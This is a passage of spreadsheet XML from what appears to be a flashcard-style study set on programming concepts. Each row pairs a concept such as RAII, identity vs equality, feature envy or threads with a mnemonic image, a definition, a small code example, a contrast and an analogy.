      <c r="G480" t="inlineStr">
        <is>
          <t>Service locator — a locator has the object FETCH deps from a registry; injection PUSHES them in, keeping the object passive.</t>
        </is>
      </c>
      <c r="H480" t="inlineStr">
        <is>
          <t>A chef handed his knife roll at the kitchen door.</t>
        </is>
      </c>
      <c r="J480" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K480" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" t="n">
        <v>0</v>
      </c>
      <c r="B481" t="inlineStr">
        <is>
          <t>479</t>
        </is>
      </c>
      <c r="C481" t="inlineStr">
        <is>
          <t>Inversion of control</t>
        </is>
      </c>
      <c r="D481" t="inlineStr">
        <is>
          <t>The HOLLYWOOD casting desk: you leave your headshot (callback) and the studio phones YOU when the scene is ready. Actors who keep calling the studio get blacklisted.</t>
        </is>
      </c>
      <c r="E481" t="inlineStr">
        <is>
          <t>The framework calls your code instead of your code calling the framework: don't call us, we'll call you (Hollywood Principle).</t>
        </is>
      </c>
      <c r="F481" t="inlineStr">
        <is>
          <t>app.on('request', handle) / # the framework invokes handle, not you</t>
        </is>
      </c>
      <c r="G481" t="inlineStr">
        <is>
          <t>DIP — DIP inverts which module owns the abstraction; IoC inverts who holds the flow of control (who calls whom).</t>
        </is>
      </c>
      <c r="H481" t="inlineStr">
        <is>
          <t>A fire alarm that rings you first.</t>
        </is>
      </c>
      <c r="J481" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K481" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" t="n">
        <v>0</v>
      </c>
      <c r="B482" t="inlineStr">
        <is>
          <t>480</t>
        </is>
      </c>
      <c r="C482" t="inlineStr">
        <is>
          <t>Object lifecycle</t>
        </is>
      </c>
      <c r="D482" t="inlineStr">
        <is>
          <t>A mayfly wearing a wristwatch: born at dawn (constructor), works the day (methods), dissolves at dusk (destructor) — the town clock (runtime) schedules every phase.</t>
        </is>
      </c>
      <c r="E482" t="inlineStr">
        <is>
          <t>The arc from allocation and construction through use to destruction or collection; the object must stay valid at every stage.</t>
        </is>
      </c>
      <c r="F482" t="inlineStr">
        <is>
          <t>obj = Widget() # birth / obj.use() # life / del obj / GC # death</t>
        </is>
      </c>
      <c r="G482" t="inlineStr">
        <is>
          <t>Variable scope — scope ends a NAME; the object may outlive it via other references and die later via GC.</t>
        </is>
      </c>
      <c r="H482" t="inlineStr">
        <is>
          <t>A hotel guest: check-in, stay, check-out.</t>
        </is>
      </c>
      <c r="J482" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K482" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" t="n">
        <v>0</v>
      </c>
      <c r="B483" t="inlineStr">
        <is>
          <t>481</t>
        </is>
      </c>
      <c r="C483" t="inlineStr">
        <is>
          <t>Construction order</t>
        </is>
      </c>
      <c r="D483" t="inlineStr">
        <is>
          <t>Building a wedding cake: the bottom tier (base) must set before the top tier (derived) goes on; at the party the top tier is eaten first (reverse destruction).</t>
        </is>
      </c>
      <c r="E483" t="inlineStr">
        <is>
          <t>Base-class constructors run before derived ones, and fields initialize in declaration order; destruction runs in reverse.</t>
        </is>
      </c>
      <c r="F483" t="inlineStr">
        <is>
          <t>class B(A): / def __init__(self): / super().__init__() # A's parts first</t>
        </is>
      </c>
      <c r="G483" t="inlineStr">
        <is>
          <t>Virtual call in constructor — reading a not-yet-built field is that pitfall; base-before-derived is the rule beneath it.</t>
        </is>
      </c>
      <c r="H483" t="inlineStr">
        <is>
          <t>Scaffolding raised bottom-up, struck top-down.</t>
        </is>
      </c>
      <c r="J483" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K483" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" t="n">
        <v>0</v>
      </c>
      <c r="B484" t="inlineStr">
        <is>
          <t>482</t>
        </is>
      </c>
      <c r="C484" t="inlineStr">
        <is>
          <t>Destructor / finalizer</t>
        </is>
      </c>
      <c r="D484" t="inlineStr">
        <is>
          <t>Two funerals: the C++ undertaker arrives the second you flatline, paperwork exact; the GC FINALizer is a distracted cousin who might hold a service someday — or skip it entirely.</t>
        </is>
      </c>
      <c r="E484" t="inlineStr">
        <is>
          <t>Code run at object destruction; deterministic destructors (C++) free resources reliably, GC finalizers may run late or never.</t>
        </is>
      </c>
      <c r="F484" t="inlineStr">
        <is>
          <t>def __del__(self): ... # may never run / # prefer 'with' / context managers</t>
        </is>
      </c>
      <c r="G484" t="inlineStr">
        <is>
          <t>Context manager __exit__ — __exit__ runs deterministically at block end; __del__ waits on the collector's whim.</t>
        </is>
      </c>
      <c r="H484" t="inlineStr">
        <is>
          <t>Hotel checkout versus an abandoned room found by housekeeping.</t>
        </is>
      </c>
      <c r="J484" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K484" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" t="n">
        <v>0</v>
      </c>
      <c r="B485" t="inlineStr">
        <is>
          <t>483</t>
        </is>
      </c>
      <c r="C485" t="inlineStr">
        <is>
          <t>RAII</t>
        </is>
      </c>
      <c r="D485" t="inlineStr">
        <is>
          <t>A scuba tank strapped on AS you jump in (constructor) that unclips itself the instant you surface (scope exit) — even if you are dragged out unconscious (exception), the strap still releases.</t>
        </is>
      </c>
      <c r="E485" t="inlineStr">
        <is>
          <t>Resource Acquisition Is Initialization: tie a resource to an object's scope—constructor acquires, destructor releases, even on exceptions.</t>
        </is>
      </c>
      <c r="F485" t="inlineStr">
        <is>
          <t>with open('f') as fh: / data = fh.read() / # closed on every exit path</t>
        </is>
      </c>
      <c r="G485" t="inlineStr">
        <is>
          <t>finally blocks — finally is manual pairing at each call site; RAII bakes release into the type so no caller can forget.</t>
        </is>
      </c>
      <c r="H485" t="inlineStr">
        <is>
          <t>A dead-man's switch on a train throttle.</t>
        </is>
      </c>
      <c r="J485" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K485" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" t="n">
        <v>0</v>
      </c>
      <c r="B486" t="inlineStr">
        <is>
          <t>484</t>
        </is>
      </c>
      <c r="C486" t="inlineStr">
        <is>
          <t>Identity vs equality</t>
        </is>
      </c>
      <c r="D486" t="inlineStr">
        <is>
          <t>Identical twins hand you two passports: same face and name on the page (equal values), but the fingerprint scanner (memory address) proves two people.</t>
        </is>
      </c>
      <c r="E486" t="inlineStr">
        <is>
          <t>Identity asks: are these the SAME object in memory (is)? Equality asks: do two objects hold equivalent values (==)?</t>
        </is>
      </c>
      <c r="F486" t="inlineStr">
        <is>
          <t>a = [1,2]; b = [1,2] / a == b # True (equal values) / a is b # False (distinct objects)</t>
        </is>
      </c>
      <c r="G486" t="inlineStr">
        <is>
          <t>Java's == — on objects Java's == tests identity; .equals() tests value equality, roughly inverse of Python's habit.</t>
        </is>
      </c>
      <c r="H486" t="inlineStr">
        <is>
          <t>Two ten-dollar bills: same worth, different serial numbers.</t>
        </is>
      </c>
      <c r="J486" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K486" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" t="n">
        <v>0</v>
      </c>
      <c r="B487" t="inlineStr">
        <is>
          <t>485</t>
        </is>
      </c>
      <c r="C487" t="inlineStr">
        <is>
          <t>equals/hashCode contract</t>
        </is>
      </c>
      <c r="D487" t="inlineStr">
        <is>
          <t>A coat check: the clerk files coats by ticket number (hash), then confirms by face (equals). Twins holding different ticket numbers means one coat is lost in the wrong rack forever.</t>
        </is>
      </c>
      <c r="E487" t="inlineStr">
        <is>
          <t>If two objects are equal they MUST have equal hash codes; violating this silently breaks hash sets and dict lookups.</t>
        </is>
      </c>
      <c r="F487" t="inlineStr">
        <is>
          <t>class P: / def __eq__(s, o): return s.id == o.id / def __hash__(s): return hash(s.id)</t>
        </is>
      </c>
      <c r="G487" t="inlineStr">
        <is>
          <t>The reverse direction — equal hashes do NOT require equal objects (collisions are fine); only equals-implies-same-hash is mandatory.</t>
        </is>
      </c>
      <c r="H487" t="inlineStr">
        <is>
          <t>A card catalog drawer plus the book's spine label.</t>
        </is>
      </c>
      <c r="J487" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K487" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" t="n">
        <v>0</v>
      </c>
      <c r="B488" t="inlineStr">
        <is>
          <t>486</t>
        </is>
      </c>
      <c r="C488" t="inlineStr">
        <is>
          <t>Value object vs entity</t>
        </is>
      </c>
      <c r="D488" t="inlineStr">
        <is>
          <t>A ten-euro note versus your dog: swap the note for another tenner and nobody cares (value); swap your dog for an identical-looking one and you very much care (entity).</t>
        </is>
      </c>
      <c r="E488" t="inlineStr">
        <is>
          <t>Value objects are defined only by their attributes (interchangeable, ideally immutable); entities keep a persistent identity over time.</t>
        </is>
      </c>
      <c r="F488" t="inlineStr">
        <is>
          <t>Money(10,'EUR') == Money(10,'EUR') / User(id=7) tracked across renames</t>
        </is>
      </c>
      <c r="G488" t="inlineStr">
        <is>
          <t>DTO — a DTO just ferries data across boundaries; a value object is a domain concept with equality semantics.</t>
        </is>
      </c>
      <c r="H488" t="inlineStr">
        <is>
          <t>Chess pieces versus the chess players.</t>
        </is>
      </c>
      <c r="J488" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K488" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" t="n">
        <v>0</v>
      </c>
      <c r="B489" t="inlineStr">
        <is>
          <t>487</t>
        </is>
      </c>
      <c r="C489" t="inlineStr">
        <is>
          <t>Two-phase initialization</t>
        </is>
      </c>
      <c r="D489" t="inlineStr">
        <is>
          <t>Flat-pack furniture delivered in a box stamped NOT A CHAIR YET: until you perform the second assembly ritual, sitting drops you to the floor.</t>
        </is>
      </c>
      <c r="E489" t="inlineStr">
        <is>
          <t>An object is constructed inert and only becomes usable after a separate init/start call - flexible, but it opens the half-initialized-object window constructors exist to prevent.</t>
        </is>
      </c>
      <c r="F489" t="inlineStr">
        <is>
          <t>srv = Server() / srv.configure(cfg) / srv.start()  # safe to use only after both calls</t>
        </is>
      </c>
      <c r="G489" t="inlineStr">
        <is>
          <t>vs constructor/RAII initialization (483): single-phase yields an invariant-complete object at birth; two-phase leaves a gap where methods are unsafe</t>
        </is>
      </c>
      <c r="H489" t="inlineStr">
        <is>
          <t>a golem waiting for the scroll in its mouth</t>
        </is>
      </c>
      <c r="J489" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K489" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" t="n">
        <v>0</v>
      </c>
      <c r="B490" t="inlineStr">
        <is>
          <t>488</t>
        </is>
      </c>
      <c r="C490" t="inlineStr">
        <is>
          <t>Copy constructor</t>
        </is>
      </c>
      <c r="D490" t="inlineStr">
        <is>
          <t>A master forger who only copies paintings from his OWN studio: he knows which layers are paint and which are glued-on photos, so his duplicates never share canvas with the original.</t>
        </is>
      </c>
      <c r="E490" t="inlineStr">
        <is>
          <t>A constructor that takes an existing instance and builds an independent duplicate - the class itself decides how deep the copy goes.</t>
        </is>
      </c>
      <c r="F490" t="inlineStr">
        <is>
          <t>C++: Point(const Point&amp; p) : x(p.x), y(p.y) {} / Python: Point.from_other(p)</t>
        </is>
      </c>
      <c r="G490" t="inlineStr">
        <is>
          <t>vs clone() methods: same goal, but the constructor states copy depth in the type and avoids Java clone's fragile contract; shallow-vs-deep choice itself lives at 345</t>
        </is>
      </c>
      <c r="H490" t="inlineStr">
        <is>
          <t>a mirror that hands you a solid twin</t>
        </is>
      </c>
      <c r="J490" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K490" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" t="n">
        <v>0</v>
      </c>
      <c r="B491" t="inlineStr">
        <is>
          <t>489</t>
        </is>
      </c>
      <c r="C491" t="inlineStr">
        <is>
          <t>Object slicing</t>
        </is>
      </c>
      <c r="D491" t="inlineStr">
        <is>
          <t>A giraffe shipped in a horse-sized crate: the packers SLICE off the neck to make it fit — what arrives is legally a horse. Ship by trailer hitch (pointer or reference) instead.</t>
        </is>
      </c>
      <c r="E491" t="inlineStr">
        <is>
          <t>C++ pitfall: assigning a derived object BY VALUE into a base variable copies only the base part, slicing off subclass data and behavior.</t>
        </is>
      </c>
      <c r="F491" t="inlineStr">
        <is>
          <t>Dog d; Animal a = d; // C++ by value / a.speak(); // Animal's version: tail sliced off</t>
        </is>
      </c>
      <c r="G491" t="inlineStr">
        <is>
          <t>Upcasting via pointer — a Base* or Base&amp; still dispatches to Dog; only by-VALUE copies slice.</t>
        </is>
      </c>
      <c r="H491" t="inlineStr">
        <is>
          <t>A passport photo cropped so the hat is gone.</t>
        </is>
      </c>
      <c r="J491" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K491" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" t="n">
        <v>0</v>
      </c>
      <c r="B492" t="inlineStr">
        <is>
          <t>490</t>
        </is>
      </c>
      <c r="C492" t="inlineStr">
        <is>
          <t>Refactoring</t>
        </is>
      </c>
      <c r="D492" t="inlineStr">
        <is>
          <t>Renovating a plane mid-flight without waking the passengers: rip out and rebuild the galley, yet every drink still arrives on time. Behavior identical, structure new.</t>
        </is>
      </c>
      <c r="E492" t="inlineStr">
        <is>
          <t>Restructuring code to improve its design WITHOUT changing observable behavior, in small steps guarded by tests.</t>
        </is>
      </c>
      <c r="F492" t="inlineStr">
        <is>
          <t>tests green -&gt; rename, extract, / inline -&gt; tests still green</t>
        </is>
      </c>
      <c r="G492" t="inlineStr">
        <is>
          <t>Rewrite — a rewrite replaces behavior wholesale with fresh risk; refactoring preserves behavior step by tiny step.</t>
        </is>
      </c>
      <c r="H492" t="inlineStr">
        <is>
          <t>Swapping the ship's planks one at a time (Theseus).</t>
        </is>
      </c>
      <c r="J492" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K492" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" t="n">
        <v>0</v>
      </c>
      <c r="B493" t="inlineStr">
        <is>
          <t>491</t>
        </is>
      </c>
      <c r="C493" t="inlineStr">
        <is>
          <t>Code smell</t>
        </is>
      </c>
      <c r="D493" t="inlineStr">
        <is>
          <t>Something reeks under the floorboards of a room where nothing looks wrong: your NOSE (heuristic), not the smoke alarm (compiler), says lift the boards.</t>
        </is>
      </c>
      <c r="E493" t="inlineStr">
        <is>
          <t>A surface symptom in code (odd size, naming, duplication) hinting at a deeper design problem worth investigating—not itself a bug.</t>
        </is>
      </c>
      <c r="F493" t="inlineStr">
        <is>
          <t>800-line class, 9 params, twin blocks / # compiles fine, still stinks</t>
        </is>
      </c>
      <c r="G493" t="inlineStr">
        <is>
          <t>Bug — a bug produces wrong behavior now; a smell predicts pain later while behavior stays correct.</t>
        </is>
      </c>
      <c r="H493" t="inlineStr">
        <is>
          <t>Milk that passes the date stamp but fails the sniff.</t>
        </is>
      </c>
      <c r="J493" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K493" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" t="n">
        <v>0</v>
      </c>
      <c r="B494" t="inlineStr">
        <is>
          <t>492</t>
        </is>
      </c>
      <c r="C494" t="inlineStr">
        <is>
          <t>DRY</t>
        </is>
      </c>
      <c r="D494" t="inlineStr">
        <is>
          <t>Two office whiteboards both list the tax rate; an intern updates only one. April arrives soaked in lawsuits — the boards disagreed. Keep ONE board. Keep it DRY.</t>
        </is>
      </c>
      <c r="E494" t="inlineStr">
        <is>
          <t>Don't Repeat Yourself: every piece of knowledge gets a single authoritative representation; duplication forks the truth.</t>
        </is>
      </c>
      <c r="F494" t="inlineStr">
        <is>
          <t>TAX = 0.21 # single source / total = net * (1 + TAX)</t>
        </is>
      </c>
      <c r="G494" t="inlineStr">
        <is>
          <t>Deduplicating lookalike code — DRY is one source of KNOWLEDGE; merging coincidentally similar code couples unrelated things.</t>
        </is>
      </c>
      <c r="H494" t="inlineStr">
        <is>
          <t>One master key versus drifting copies.</t>
        </is>
      </c>
      <c r="J494" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K494" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" t="n">
        <v>0</v>
      </c>
      <c r="B495" t="inlineStr">
        <is>
          <t>493</t>
        </is>
      </c>
      <c r="C495" t="inlineStr">
        <is>
          <t>KISS &amp; YAGNI</t>
        </is>
      </c>
      <c r="D495" t="inlineStr">
        <is>
          <t>One camper packs a KISS-simple folding pocketknife; his buddy hauls a 40-kilo might-need-it trunk (YAGNI violation) up the trail, uses none of it, and wheezes at the summit.</t>
        </is>
      </c>
      <c r="E495" t="inlineStr">
        <is>
          <t>KISS: prefer the simplest design that works. YAGNI: don't build features until actually needed—most 'later' never comes.</t>
        </is>
      </c>
      <c r="F495" t="inlineStr">
        <is>
          <t>need CSV export today? / write csv_export() / not ExportFrameworkFactory</t>
        </is>
      </c>
      <c r="G495" t="inlineStr">
        <is>
          <t>Underengineering — KISS/YAGNI trim speculation, never required correctness: simplest thing that WORKS, not almost works.</t>
        </is>
      </c>
      <c r="H495" t="inlineStr">
        <is>
          <t>A bicycle versus gold-plated unused gears.</t>
        </is>
      </c>
      <c r="J495" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K495" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" t="n">
        <v>0</v>
      </c>
      <c r="B496" t="inlineStr">
        <is>
          <t>494</t>
        </is>
      </c>
      <c r="C496" t="inlineStr">
        <is>
          <t>Coupling &amp; cohesion</t>
        </is>
      </c>
      <c r="D496" t="inlineStr">
        <is>
          <t>Mountain camp: inside each tent the gear is packed tight and orderly (cohesion); between tents runs just one thin rope (coupling). Cross-lace fifty ropes and one slip drags every tent off the cliff.</t>
        </is>
      </c>
      <c r="E496" t="inlineStr">
        <is>
          <t>Aim for low coupling (few, thin dependencies between modules) and high cohesion (each module's parts belong tightly together).</t>
        </is>
      </c>
      <c r="F496" t="inlineStr">
        <is>
          <t>cohesive: Wallet{balance, add, spend} / coupled: Wallet reads UI.textbox</t>
        </is>
      </c>
      <c r="G496" t="inlineStr">
        <is>
          <t>Encapsulation — encapsulation is a mechanism inside one class; coupling and cohesion measure between and within modules.</t>
        </is>
      </c>
      <c r="H496" t="inlineStr">
        <is>
          <t>LEGO bricks: strong studs within, single studs between.</t>
        </is>
      </c>
      <c r="J496" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K496" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" t="n">
        <v>0</v>
      </c>
      <c r="B497" t="inlineStr">
        <is>
          <t>495</t>
        </is>
      </c>
      <c r="C497" t="inlineStr">
        <is>
          <t>Long method</t>
        </is>
      </c>
      <c r="D497" t="inlineStr">
        <is>
          <t>A single run-on sentence tattooed down someone's whole arm, wrist to shoulder; readers keep rotating the arm and losing their place. Paragraphs exist for a reason.</t>
        </is>
      </c>
      <c r="E497" t="inlineStr">
        <is>
          <t>Smell: a function long enough to need scrolling, with comments as section headers—each labeled chunk wants extracting.</t>
        </is>
      </c>
      <c r="F497" t="inlineStr">
        <is>
          <t>def process(): # 300 lines / # -- validate -- / # -- price -- # comments = seams</t>
        </is>
      </c>
      <c r="G497" t="inlineStr">
        <is>
          <t>Large class — a large class hoards many responsibilities at type level; a long method crams many steps into one function.</t>
        </is>
      </c>
      <c r="H497" t="inlineStr">
        <is>
          <t>A 40-verse karaoke song nobody finishes.</t>
        </is>
      </c>
      <c r="J497" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K497" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" t="n">
        <v>0</v>
      </c>
      <c r="B498" t="inlineStr">
        <is>
          <t>496</t>
        </is>
      </c>
      <c r="C498" t="inlineStr">
        <is>
          <t>Feature envy</t>
        </is>
      </c>
      <c r="D498" t="inlineStr">
        <is>
          <t>A neighbor who cooks every meal in YOUR kitchen: opens your fridge, uses your knives, then carries dinner back home. Move him in (move the method) or change the locks.</t>
        </is>
      </c>
      <c r="E498" t="inlineStr">
        <is>
          <t>Smell: a method that mostly reads and manipulates ANOTHER object's data—move the method to where the data lives.</t>
        </is>
      </c>
      <c r="F498" t="inlineStr">
        <is>
          <t>def total(order): / return order.qty * order.price / # lives outside Order: move it in</t>
        </is>
      </c>
      <c r="G498" t="inlineStr">
        <is>
          <t>Law of Demeter violation — Demeter counts dots in a call chain; feature envy asks which class should OWN the logic.</t>
        </is>
      </c>
      <c r="H498" t="inlineStr">
        <is>
          <t>A cuckoo laying its eggs in another bird's nest.</t>
        </is>
      </c>
      <c r="J498" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K498" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" t="n">
        <v>0</v>
      </c>
      <c r="B499" t="inlineStr">
        <is>
          <t>497</t>
        </is>
      </c>
      <c r="C499" t="inlineStr">
        <is>
          <t>Primitive obsession &amp; magic numbers</t>
        </is>
      </c>
      <c r="D499" t="inlineStr">
        <is>
          <t>A wizard mutters '86400' and '0.21' over the cauldron — apprentices copy the MAGIC NUMBERS wrong and the potion explodes. Label the vials: SECONDS_PER_DAY, TAX_RATE.</t>
        </is>
      </c>
      <c r="E499" t="inlineStr">
        <is>
          <t>Smell: raw ints/strings and bare literals stand in for domain concepts; wrap them in named constants and small types.</t>
        </is>
      </c>
      <c r="F499" t="inlineStr">
        <is>
          <t>bad: if status == 3: retry(86400) / good: if status == Status.FAILED: / retry(SECONDS_PER_DAY)</t>
        </is>
      </c>
      <c r="G499" t="inlineStr">
        <is>
          <t>Value object — the value object (Money, Email) is the CURE that replaces obsessive primitives with real types.</t>
        </is>
      </c>
      <c r="H499" t="inlineStr">
        <is>
          <t>Unlabeled spice jars in a factory kitchen.</t>
        </is>
      </c>
      <c r="J499" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K499" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" t="n">
        <v>0</v>
      </c>
      <c r="B500" t="inlineStr">
        <is>
          <t>498</t>
        </is>
      </c>
      <c r="C500" t="inlineStr">
        <is>
          <t>Extract method</t>
        </is>
      </c>
      <c r="D500" t="inlineStr">
        <is>
          <t>A dentist EXTRACTS one tangled tooth from the jaw (long method) and mounts it on its own little stand with a nameplate — the jaw finally closes, and the tooth can be inspected alone.</t>
        </is>
      </c>
      <c r="E500" t="inlineStr">
        <is>
          <t>Refactoring: pull a coherent code fragment into a new well-named method and call it, turning comments into names.</t>
        </is>
      </c>
      <c r="F500" t="inlineStr">
        <is>
          <t># -- validate input -- becomes: / validate_input(order) / # the name replaces the comment</t>
        </is>
      </c>
      <c r="G500" t="inlineStr">
        <is>
          <t>Inline method — inline is the exact inverse: dissolve a needless method back into its caller.</t>
        </is>
      </c>
      <c r="H500" t="inlineStr">
        <is>
          <t>Pulling one thread onto its own labeled spool.</t>
        </is>
      </c>
      <c r="J500" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K500" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" t="n">
        <v>0</v>
      </c>
      <c r="B501" t="inlineStr">
        <is>
          <t>499</t>
        </is>
      </c>
      <c r="C501" t="inlineStr">
        <is>
          <t>Boy-scout rule</t>
        </is>
      </c>
      <c r="D501" t="inlineStr">
        <is>
          <t>A scout troop crossing a campsite: each kid pockets ONE piece of litter on the way through; by season's end the forest floor gleams, though no cleanup day was ever held.</t>
        </is>
      </c>
      <c r="E501" t="inlineStr">
        <is>
          <t>Always leave the code a little cleaner than you found it: tiny opportunistic cleanups on every visit compound into health.</t>
        </is>
      </c>
      <c r="F501" t="inlineStr">
        <is>
          <t>while fixing a bug: / rename tmp2 -&gt; retry_count, / delete the dead branch</t>
        </is>
      </c>
      <c r="G501" t="inlineStr">
        <is>
          <t>Big-bang refactor — the scout rule is continuous micro-cleanup in passing; a dedicated rewrite is a separate scheduled effort.</t>
        </is>
      </c>
      <c r="H501" t="inlineStr">
        <is>
          <t>Wiping the gym bench after your set.</t>
        </is>
      </c>
      <c r="J501" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K501" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" t="n">
        <v>0</v>
      </c>
      <c r="B502" t="inlineStr">
        <is>
          <t>500</t>
        </is>
      </c>
      <c r="C502" t="inlineStr">
        <is>
          <t>Concurrency vs parallelism</t>
        </is>
      </c>
      <c r="D502" t="inlineStr">
        <is>
          <t>One barista juggling five orders by switching between them, versus five baristas each pulling an espresso shot at the same instant.</t>
        </is>
      </c>
      <c r="E502" t="inlineStr">
        <is>
          <t>Concurrency structures a program to handle many tasks at once; parallelism actually executes tasks simultaneously on multiple cores.</t>
        </is>
      </c>
      <c r="F502" t="inlineStr">
        <is>
          <t>1 core, 4 threads: concurrent, not parallel / 4 cores, 4 threads: parallel</t>
        </is>
      </c>
      <c r="G502" t="inlineStr">
        <is>
          <t>Parallelism alone — parallelism requires simultaneous execution; concurrency only requires interleaved progress.</t>
        </is>
      </c>
      <c r="H502" t="inlineStr">
        <is>
          <t>A juggler (concurrency) vs an octopus with eight hands (parallelism).</t>
        </is>
      </c>
      <c r="J502" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K502" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" t="n">
        <v>0</v>
      </c>
      <c r="B503" t="inlineStr">
        <is>
          <t>501</t>
        </is>
      </c>
      <c r="C503" t="inlineStr">
        <is>
          <t>Process</t>
        </is>
      </c>
      <c r="D503" t="inlineStr">
        <is>
          <t>A sealed apartment: its own walls, fridge, and mailbox — neighbors cannot reach in without formally knocking (IPC).</t>
        </is>
      </c>
      <c r="E503" t="inlineStr">
        <is>
          <t>An OS-level running program with its own private address space, file handles, and at least one thread.</t>
        </is>
      </c>
      <c r="F503" t="inlineStr">
        <is>
          <t>p = multiprocessing.Process(target=work) / p.start(); p.join()</t>
        </is>
      </c>
      <c r="G503" t="inlineStr">
        <is>
          <t>Thread — threads share their process's memory; processes are isolated from each other.</t>
        </is>
      </c>
      <c r="H503" t="inlineStr">
        <is>
          <t>A country with borders and its own currency.</t>
        </is>
      </c>
      <c r="J503" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K503" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" t="n">
        <v>0</v>
      </c>
      <c r="B504" t="inlineStr">
        <is>
          <t>502</t>
        </is>
      </c>
      <c r="C504" t="inlineStr">
        <is>
          <t>Thread</t>
        </is>
      </c>
      <c r="D504" t="inlineStr">
        <is>
          <t>Roommates in one apartment: shared kitchen (heap), but each keeps a private diary (stack) and their own finger on their own page (PC).</t>
        </is>
      </c>
      <c r="E504" t="inlineStr">
        <is>
          <t>A schedulable execution stream inside a process; threads share the heap but each has its own stack and program counter.</t>
        </is>
      </c>
      <c r="F504" t="inlineStr">
        <is>
          <t>t = threading.Thread(target=work) / t.start(); t.join()</t>
        </is>
      </c>
      <c r="G504" t="inlineStr">
        <is>
          <t>Process — a process owns its memory; a thread borrows its enclosing process's memory.</t>
        </is>
      </c>
      <c r="H504" t="inlineStr">
        <is>
          <t>Multiple sewing threads through one piece of fabric.</t>
        </is>
      </c>
      <c r="J504" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K504" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" t="n">
        <v>0</v>
      </c>
